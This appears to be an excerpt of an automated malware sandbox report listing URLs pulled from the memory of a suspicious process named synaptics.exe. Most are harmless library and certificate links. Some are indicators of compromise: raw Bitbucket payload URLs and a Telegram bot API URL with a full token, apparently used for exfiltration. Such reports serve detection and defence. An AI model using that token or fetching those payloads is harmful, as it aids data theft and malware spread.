                                                http://crl.dhimyotis.com/certignarootca.crlbsynaptics.exe, 00000023.00000002.2483896913.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2320294846.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.000000000216C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/pyca/pyopenssl/pull/933synaptics.exe, 00000023.00000003.2047361472.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2044965901.0000000001F8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxysynaptics.exe, 00000023.00000002.2505886757.0000000004400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      http://blog.kowalczyk.info/software/sumatrapdf/translators.htmlTheA vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpfalse
                                                        high
                                                        https://bbc-frontbucket-static.stg-east.frosynaptics.exe, 00000023.00000003.2444078875.0000000001F97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://bugs.python.org/issue14396.synaptics.exe, 00000023.00000003.2153905637.00000000023A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://wwww.certigna.fr/autorites/0msynaptics.exe, 00000023.00000002.2483896913.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2320294846.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.000000000216C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bitbucket.org/lonenone111/adonis/raw/89091ec6e33c9172bd3cb331f105865ef2ded747/Adonis_Pure_Ensynaptics.exe, 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://urllib3.readthedocs.io/en/latestsynaptics.exe, 00000023.00000003.2075242644.0000000002106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://php.net/manual/en/function.version-compare.phpsynaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2216147301.00000000045ED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_Allsynaptics.exe, 00000023.00000002.2456483780.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2470279767.0000000001950000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://httpbin.org/synaptics.exe, 00000023.00000003.2086898648.0000000002111000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlsynaptics.exe, 00000023.00000003.1935039535.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935168660.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1929743426.0000000002034000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/urllib3/urllib3/issues/3267.synaptics.exe, 00000023.00000003.2047361472.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2044965901.0000000001F8A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.htmlsynaptics.exe, 00000023.00000003.2002411335.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tools.ietf.org/html/rfc3986#section-5.2.4synaptics.exe, 00000023.00000003.2023485101.0000000002088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.ietf.org/rfc/rfc3447.txtsynaptics.exe, 00000023.00000003.2445236908.0000000004602000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325148663.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2307482653.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.000000000274F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2271824357.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2266201421.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2311142499.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2268319688.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2294477046.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2301642340.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045FE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2290021949.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2313396826.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.0000000002707000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2273874947.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2296653191.0000000004603000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2309247135.0000000004603000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://github.com/python/cpython/pull/7160#discussion_r195405230synaptics.exe, 00000023.00000003.1954332606.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1950993740.0000000002034000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.ecosia.org/newtab/synaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.flashvidz.tk/ZenonprogramA vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                    high
                                                                                    http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.17.2713&rep=rep1&type=pdfsynaptics.exe, 00000023.00000003.2239174169.00000000045ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://gist.github.com/4325783synaptics.exe, 00000023.00000003.1927018738.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1926846326.0000000002034000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535synaptics.exe, 00000023.00000003.2016874067.0000000002123000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2030551439.0000000002124000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.0000000002123000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2037301715.0000000002124000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.0000000002124000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://tools.ietf.org/html/rfc3986#appendix-Asynaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://github.com/python-hyper/rfc3986synaptics.exe, 00000023.00000003.2030364344.0000000002094000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002088000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76synaptics.exe, 00000023.00000003.2325645647.00000000023B8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2202235071.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2190964614.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000002019000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://github.com/pypa/setuptools/issues/417#issuecomment-392298401synaptics.exe, 00000023.00000003.1910336488.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1896689507.0000000000D41000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1910336488.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1908572278.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1896689507.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1913611599.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2470279767.0000000001950000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://docs.python.org/3.3/howto/logging.html#configuring-logging-for-a-librarysynaptics.exe, 00000023.00000003.2091470869.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2094571264.00000000020F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://blog.kowalczyk.info/software/sumatrapdf/translations.htmlContributeA vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.securetrust.com/STCA.crlsynaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tools.ietf.org/html/rfc6125#section-6.4.3synaptics.exe, 00000023.00000003.2101481574.0000000002104000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2075242644.0000000002106000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://tools.ietf.org/html/rfc3986#section-3.3synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://cdn.cookielaw.org/synaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap04.html#tag_04_13)synaptics.exe, 00000023.00000003.1947553736.000000000201D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.esat.kuleuven.be/cosic/publications/article-1432.pdfsynaptics.exe, 00000023.00000003.2201080353.00000000045E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://www.cert.fnmt.es/dpcs/synaptics.exe, 00000023.00000002.2483896913.0000000002103000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://google.com/mailsynaptics.exe, 00000023.00000003.2084198547.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2092863211.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2150769416.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2121139838.00000000020EE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2121634293.0000000002749000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2113697144.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2157009339.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.00000000020EF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2091470869.00000000020E4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000020F1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2110641984.00000000020F0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081093217.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2098540705.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2173422749.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2205829752.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2192423602.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2149525238.0000000002747000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081651279.000000000213C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.accv.es00synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000020F3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.00000000020F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmsynaptics.exe, 00000023.00000003.1935039535.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935168660.0000000000D45000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1929743426.0000000002034000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.rfc-editor.org/info/rfc7253synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/urllib3/urllib3/pull/3024synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://tools.ietf.org/html/rfc8017#page-67synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2322096151.0000000000D69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.synaptics.exe, 00000023.00000003.2054763098.0000000002140000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081651279.0000000002140000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.0000000002140000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2041218643.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.zeniko.ch/#SumatraPDFSimonA vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://mahler:8092/site-updates.pysynaptics.exe, 00000023.00000003.2039743862.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1956138325.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2137443994.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2100621573.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1940113752.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2069043267.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1896689507.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2128006354.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1959266113.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1931385673.0000000002030000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1926911408.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1907119440.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1937976815.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935930288.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1915176286.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946403574.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2144294615.0000000002033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://api.telegram.org/bot7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs/sendMessagesynaptics.exe, 00000023.00000002.2535963450.00000000050C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://bugs.python.org/issue19404synaptics.exe, 00000023.00000003.1957786322.000000000203B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://urllib3.readthedocs.io/esynaptics.exe, 00000023.00000003.2086898648.000000000211A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://github.com/urllib3/urllib3/issues/651synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://urllib3.readthedocs.io/en/latest/advanced-usage.htmlsynaptics.exe, 00000023.00000003.2047361472.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2044965901.0000000001F8A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2047361472.0000000001F93000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.firmaprofesional.com/cps0synaptics.exe, 00000023.00000003.2160636724.0000000002248000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2176498589.0000000002248000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260160456.0000000002248000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://ocsp.accv.esisynaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://github.com/urllib3/urllib3/issues/2920synaptics.exe, 00000023.00000002.2505886757.0000000004400000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2083225319.0000000001F78000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://crl.securetrust.com/SGCA.crl0synaptics.exe, 00000023.00000002.2479567499.0000000001F60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2146809732.0000000001F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netsynaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1980946741.0000000000CEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPagA vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.quovadisglobal.com/cps0synaptics.exe, 00000023.00000003.2145450452.00000000023C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.ietf.org/rfc/rfc4627.txtsynaptics.exe, 00000023.00000003.2133539100.00000000021DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://www.iana.org/time-zones/repository/tz-link.htmlsynaptics.exe, 00000023.00000003.1935168660.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1931385673.0000000002030000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1947041661.0000000000D35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://tools.ietf.org/html/rfc6455#section-5.2synaptics.exe, 00000023.00000003.2204296782.0000000002675000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2524332915.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2523286753.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2185500761.000000000263E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://blog.kowalczyk.infoKrzysztofA vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://bugs.python.org/issue29585synaptics.exe, 00000023.00000003.1887784322.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.htmlsynaptics.exe, 00000023.00000003.1924262655.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1924671044.0000000000D60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/synaptics.exe, 00000023.00000002.2456483780.0000000000C89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/synaptics.exe, 00000023.00000003.2002411335.0000000002114000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosynaptics.exe, 00000023.00000003.2319179620.000000000464B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.iana.org/assignments/media-typessynaptics.exe, 00000023.00000003.2040398123.00000000020EC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2036927307.0000000002051000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://ocsp.accv.es0synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://web-security-reports.services.atlassian.com/csp-report/bb-websitesynaptics.exe, 00000023.00000003.1981283714.000000000209D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.python.org/synaptics.exe, 00000023.00000003.1907119440.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1937976815.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1935930288.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1915176286.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1946403574.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2144294615.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1947553736.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2053830414.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904574093.0000000002034000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1904725608.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2024336898.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1941916880.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1944517560.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1954644425.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2059049701.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1951246031.0000000002033000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://foss.heptaposynaptics.exe, 00000023.00000003.2030551439.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.000000000218C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.000000000218C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
